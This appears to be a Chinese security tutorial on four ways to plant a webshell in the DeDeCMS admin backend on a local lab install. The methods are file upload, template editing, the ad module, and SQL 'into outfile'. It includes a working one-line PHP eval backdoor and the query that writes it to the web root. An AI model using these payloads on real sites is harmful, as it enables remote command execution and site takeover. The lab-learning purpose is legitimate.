CMS漏洞-DeDeCMS篇

一.姿势一:通过⽂件管理器上传WebShell

1.首先我们搭建网站然后进行登录

2.模块👉文件管理器👉文件上传

3.新建一个1.php文件,内容为:

<?php phpinfo();?>

选择1.php文件上传

4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!!

二.姿势二:修改模板文件拿WebShell

1.模板👉默认模板管理👉index.htm👉修改

2.插入代码:

<?php phpinfo();?>并保存

3.生成👉更新主机html,主页位置修改为index.php,生成静态,更新主页html

4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!

三.姿势三:后台任意命令执⾏拿WebShell

1.模块👉广告管理

在内容上写入代码:

<?php phpinfo();?>

2.上传成功后查看代码,并复制引号内容

3.访问后发现页面无回显

4.现在我们将代码换为一句话木马:

<?php @eval($_POST[cmd]);?>

5.跟上述步骤一样复制引号内容并访问

6.使用蚁剑连接,连接成功!!

说明木马成功植入

四.姿势四:通过后台sql命令执⾏拿webshell

1.系统👉sql命令行工具

在命令行输入select @@basedir;

获取mysql路径,由此猜测⽹站绝对路径

2.在命令行输入:

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/dedecms/uploads/webshell.php'

上传一句话木马到webshell.php文件

3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马

4.我们访问木马文件并复制其绝对路径

5.连接成功!

木马植入成功!

相关推荐
Codingwiz_Joy2 小时前
Day14 -实例 -利用工具进行js框架的信息收集
安全·web·js·安全性测试
AORO_BEIDOU3 小时前
cippe2025北京石油展,遨游通讯将携多款防爆手机亮相!
网络·人工智能·安全·智能手机·信息与通信
青岛前景互联信息技术有限公司4 小时前
智慧港口新未来:大数据赋能应急消防,筑牢安全防线
大数据·人工智能·物联网·安全·智慧城市
CharlesG07 小时前
NAT 实验:多私网环境下 NAPT、Easy IP 配置及 FTP 服务公网映射
运维·服务器·网络·网络协议·tcp/ip·安全·ip
sukida1008 小时前
在Fedora-Workstation-Live-x86_64-41-1.4中使用最新版本firefox和腾讯翻译插件让英文网页显示中文翻译
firefox·腾讯翻译
mingzhi6112 小时前
绿盟面试题
安全·web安全·网络安全·绿盟科技
CYRUS_STUDIO12 小时前
Android 自定义变形 MD5 算法
android·算法·安全
不羁。。13 小时前
【操作系统安全】任务3:Linux 网络安全实战命令手册
linux·安全·web安全
神经毒素13 小时前
WEB安全--SQL注入--DNSlog外带
安全·web安全